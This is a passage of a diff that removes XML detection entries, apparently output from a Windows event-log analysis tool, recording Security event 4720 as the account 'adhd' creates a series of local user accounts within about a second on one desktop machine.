-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:59.0354107Z'/&gt;&lt;EventRecordID&gt;4555&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Kelly&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1085&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Kelly&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Kelly</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4549</recordid>
-            <time>2020-06-11 22:04:58.948843300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.9488433Z'/&gt;&lt;EventRecordID&gt;4549&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Nicole&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1084&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Nicole&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Nicole</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4543</recordid>
-            <time>2020-06-11 22:04:58.859109700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.8591097Z'/&gt;&lt;EventRecordID&gt;4543&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Willie&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1083&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Willie&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Willie</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4537</recordid>
-            <time>2020-06-11 22:04:58.779567500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.7795675Z'/&gt;&lt;EventRecordID&gt;4537&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Eugene&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1082&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Eugene&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Eugene</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4531</recordid>
-            <time>2020-06-11 22:04:58.692479100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.6924791Z'/&gt;&lt;EventRecordID&gt;4531&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jeremy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1081&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jeremy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jeremy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4525</recordid>
-            <time>2020-06-11 22:04:58.622986800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.6229868Z'/&gt;&lt;EventRecordID&gt;4525&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Wayne&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1080&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Wayne&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Wayne</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4519</recordid>
-            <time>2020-06-11 22:04:58.539431200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.5394312Z'/&gt;&lt;EventRecordID&gt;4519&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Laura&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1079&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Laura&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Laura</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4513</recordid>
-            <time>2020-06-11 22:04:58.448591100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.4485911Z'/&gt;&lt;EventRecordID&gt;4513&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Eric&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1078&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Eric&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Eric</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4507</recordid>
-            <time>2020-06-11 22:04:58.356612800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.3566128Z'/&gt;&lt;EventRecordID&gt;4507&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Russell&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1077&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Russell&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Russell</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4501</recordid>
-            <time>2020-06-11 22:04:58.268168600Z</time>
-            <channel>Security</channel>
